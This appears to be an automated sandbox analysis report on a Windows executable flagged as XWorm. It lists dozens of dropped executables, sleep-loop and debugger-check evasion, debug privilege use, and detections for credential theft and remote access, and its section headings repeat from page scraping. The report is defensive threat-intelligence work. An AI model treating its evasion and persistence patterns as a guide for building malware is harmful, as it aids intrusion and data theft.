Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\System\xIpouRJ.exe	API coverage: 0.7 %
Source: C:\Windows\System\ERbKWDm.exe	API coverage: 2.1 %
Source: C:\Windows\System\wHnuprt.exe	API coverage: 2.1 %
Source: C:\Windows\System\uxMRJKa.exe	API coverage: 2.1 %
Source: C:\Windows\System\bJVoOik.exe	API coverage: 1.4 %
Source: C:\Windows\System\wkazDeV.exe	API coverage: 2.1 %
Source: C:\Windows\System\VWrcuzM.exe	API coverage: 1.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 6117 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 3630 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4240	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System\xIpouRJ.exe TID: 6324	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\ERbKWDm.exe TID: 6752	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wHnuprt.exe TID: 2024	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\uxMRJKa.exe TID: 5260	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\bJVoOik.exe TID: 6368	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wkazDeV.exe TID: 6340	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VWrcuzM.exe TID: 6012	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wJNkgSa.exe TID: 7024	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\imwRXsl.exe TID: 6400	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\bzSbRdi.exe TID: 820	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\Csmwgyb.exe TID: 6732	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\defQfgC.exe TID: 6420	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\XZxtJFw.exe TID: 1412	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\MwFvbxc.exe TID: 6364	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\hAOVVjq.exe TID: 6344	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\oxCQuSo.exe TID: 524	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\vyHGCnK.exe TID: 432	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\mbSqRHL.exe TID: 5096	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VFkciqc.exe TID: 6168	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\sdTevgk.exe TID: 6768	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\eVVPPqR.exe TID: 6444	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VHwkuIa.exe TID: 1452	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\WLWcTVM.exe TID: 336	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\WCbcoxD.exe TID: 5984	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\QWtCxan.exe TID: 576	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\fpHmIIc.exe TID: 4016	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\FGSooXz.exe TID: 7044	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\mKdsHiQ.exe TID: 5064	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\nWSykjl.exe TID: 7192	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\LKurWpq.exe TID: 7208	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\iHSYLud.exe TID: 7224	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\tyQdqmC.exe TID: 7240	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\sabRErB.exe TID: 7260	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\ZTSJHKb.exe TID: 7276	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\xNhRSWh.exe TID: 7292	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\jtnQpnb.exe TID: 7308	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\hEUEsIC.exe TID: 7324	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\UqXZtcb.exe TID: 7340	Thread sleep time: -41000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685B760

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System\xIpouRJ.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\ERbKWDm.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wHnuprt.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\uxMRJKa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\bJVoOik.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wkazDeV.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VWrcuzM.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wJNkgSa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\imwRXsl.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\bzSbRdi.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\Csmwgyb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\defQfgC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\XZxtJFw.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\MwFvbxc.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\hAOVVjq.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\oxCQuSo.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\vyHGCnK.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\mbSqRHL.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VFkciqc.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\sdTevgk.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\eVVPPqR.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VHwkuIa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\WLWcTVM.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\WCbcoxD.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\QWtCxan.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\fpHmIIc.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\FGSooXz.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\mKdsHiQ.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\nWSykjl.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\LKurWpq.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\iHSYLud.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\tyQdqmC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\sabRErB.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\ZTSJHKb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\xNhRSWh.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\jtnQpnb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\hEUEsIC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\UqXZtcb.exe	Thread delayed: delay time: 41000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System\xIpouRJ.exe

Code function: 4_2_00007FF66689D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF66689D6D4

Contains functionality to dynamically determine API calls

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685EBF0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF66689D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF66689D6D4
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DC6D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF67DC6D6D4
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DCD4578 SetUnhandledExceptionFilter,	5_2_00007FF67DCD4578
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3BFD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7C3BFD6D4
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C64578 SetUnhandledExceptionFilter,	6_2_00007FF7C3C64578
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94578 SetUnhandledExceptionFilter,	7_2_00007FF6BEB94578
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB2D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6BEB2D6D4
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D7D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6B3D7D6D4
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DE4578 SetUnhandledExceptionFilter,	8_2_00007FF6B3DE4578
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B3AD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF68B3AD6D4
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B414578 SetUnhandledExceptionFilter,	9_2_00007FF68B414578
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748434578 SetUnhandledExceptionFilter,	10_2_00007FF748434578
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF7483CD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF7483CD6D4

Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: conhost.exe, 00000002.00000002.4019156239.00000271E8700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match

File source: Process Memory Space: file.exe PID: 6220, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match

File source: Process Memory Space: file.exe PID: 6220, type: MEMORYSTR

ID:	1522712
Product:	CloudBasic
Start time:	15:48:46
Start date:	30.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	011d87d169d7ba9f3d3fd9a7f6e4bf2d
SHA1:	d8b3f16c867541fb03f460a59042d17bbc20c0cf
SHA256:	1576f68ec71aa3b79d2f3ab363ee523951bde5da0d6afccc4a08247e48fd548b
Filetype:	Win64 Executable Console (202006/5) 81.26%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by